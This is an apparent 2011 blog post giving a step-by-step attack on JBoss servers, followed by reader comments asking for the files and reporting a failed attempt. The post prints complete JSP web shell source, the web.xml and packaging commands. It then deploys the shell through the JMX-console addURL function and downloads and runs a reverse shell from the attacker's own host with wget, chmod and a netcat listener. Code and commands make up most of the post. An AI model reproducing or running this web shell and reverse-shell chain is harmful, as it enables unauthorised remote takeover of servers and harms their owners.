Saturday, 19 February 2011

How to hack ANY version of JBOSS



Hi everyone, in this post I will explain how to hack ANY version of JBOSS and get root to the target machine.
1) Browse the target machine : http://mytargettest.com:8080
2) Click on the JMX-CONSOLE, if you can see the page, that's great.
3) Now you need to create a war file with our shell.

3.1) mkdir WEB-INF
3.2)vi cmd.jsp and insert this:
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>

3.3)vi WEB-INF/web.xml  and insert this:
<?xml version="1.0" ?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
version="2.4">
<servlet>
<servlet-name>Command</servlet-name>
<jsp-file>/cmd.jsp</jsp-file>
</servlet>
</web-app>

3.4) now you have to compile it :  jar cvf cmd.war WEB-INF cmd.jsp
3.5) Move this file to your pentest webserver, you will need to download this file to the target machine.
4) Now browse http://mytargettest.com:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL
5) Search for "void addURL()"
6) Insert the address for your war file , in my case  :  http://172.16.1.79/exploits/cmd.war  and click INVOKE
7) It will take about 1min , then you can browse your application http://mytargettest.com:8080/cmd/cmd.jsp
8) Now you just need to type the commands like.. "id" , if you are not root, then you need to find a exploit to root the machine
9) Meanwhile you can get shell to the machine doing this
10) Download to the machine a reverse shell  : wget -P /tmp http://172.16.1.79/exploits/airwolf_reverse_shell
11) chmod +x /tmp/airwolf_reverse_shell
12) prepare your pentest machine to get the reverse shell :  nc -l -p 8080 -vvv
13) Run the reverse shell on the target machine  : /tmp/airwolf_reverse_shell
14) you are now connected to the server.

Thanks for watching.

8 comments:

  1. This comment has been removed by the author.

    ReplyDelete
  2. excellent article
    I'm trying to compile the files but I can not, you could send the file in mai email?

    cmd.war??

    ReplyDelete
  3. Hello, please post here the error that you are getting, maybe others are facing the same problem, then I can help you and others at the same time.

    Thanks for the comment.

    ReplyDelete
  4. nice work!!
    it had remember me this attack http://www.youtube.com/watch?v=yghiC_U2RaM
    includes it, elevation privilege and reverse shell XD

    regards..

    ReplyDelete
  5. HI!,
    I was trying to do this.
    I compiled with no problems the WAR, I AddURL with the URL, and it says
    Operation completed successfully without a return value!
    But then I go to the URL and
    HTTP Status 404 - /cmd/cmd.jsp
    type Status report
    message /cmd/cmd.jsp
    description The requested resource (/cmd/cmd.jsp) is not available.


    What am I doing wrong?

    ReplyDelete
  6. This comment has been removed by the author.

    ReplyDelete
  7. airwolf_reverse_shell ??
    payload ??
    and another required files ??
    can you mail me ??

    ReplyDelete
  8. I surprise how much effort you put to create such a great informative websitemagazine

    ReplyDelete